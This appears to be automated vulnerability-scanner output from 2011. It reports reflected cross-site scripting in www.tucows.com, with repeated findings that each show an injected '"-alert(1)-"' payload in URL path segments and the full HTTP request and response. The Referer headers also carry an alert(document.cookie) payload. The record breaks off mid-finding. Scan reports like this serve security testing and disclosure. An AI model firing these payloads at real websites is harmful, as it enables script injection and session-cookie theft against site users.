The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49df9"-alert(1)-"7cec1abd243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes49df9"-alert(1)-"7cec1abd243/js/aalib.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f1c"-alert(1)-"5f5b3393d9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82b97"-alert(1)-"d0e2ad1d532 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:57 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccea9"-alert(1)-"cd05073d4ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87352"-alert(1)-"0f2157d1bbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3034"-alert(1)-"04ca174d04c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:54 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5361f"-alert(1)-"5652dc7710f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e1"-alert(1)-"042603f8178 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ec8"-alert(1)-"817640c3898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/show_layer.js82ec8"-alert(1)-"817640c3898 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da601"-alert(1)-"3c77224e1a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesda601"-alert(1)-"3c77224e1a9/js/signupin.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e58a"-alert(1)-"92953272be5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js7e58a"-alert(1)-"92953272be5/signupin.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee858"-alert(1)-"2b00b808463 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/signupin.jsee858"-alert(1)-"2b00b808463 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:54 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65747"-alert(1)-"fdf529e6e6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
